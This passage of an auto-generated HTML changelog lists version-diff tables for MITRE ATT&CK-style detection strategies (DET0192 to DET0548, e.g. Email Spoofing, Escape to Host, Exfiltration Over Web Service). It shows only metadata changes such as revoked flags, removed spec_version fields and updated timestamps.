solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0192] Detection Strategy for Email Hiding Rules</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0431] Detection Strategy for Email Spoofing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0214] Detection Strategy for Embedded Payloads</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0273] Detection Strategy for Encrypted Channel across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0543] Detection Strategy for Encrypted Channel via Asymmetric Cryptography across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0143] Detection Strategy for Encrypted Channel via Symmetric Cryptography across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0304] Detection Strategy for Endpoint DoS via Application or System Exploitation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0173] Detection Strategy for Endpoint DoS via Service Exhaustion Flood</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0219] Detection Strategy for Escape to Host</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0369] Detection Strategy for Event Triggered Execution via Trap (T1546.005)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0555] Detection Strategy for Event Triggered Execution via emond on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0557] Detection Strategy for Event Triggered Execution: AppInit DLLs (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0015] Detection Strategy for Exclusive Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0348] Detection Strategy for Exfiltration Over C2 Channel</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0548] Detection Strategy for Exfiltration Over Web Service</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 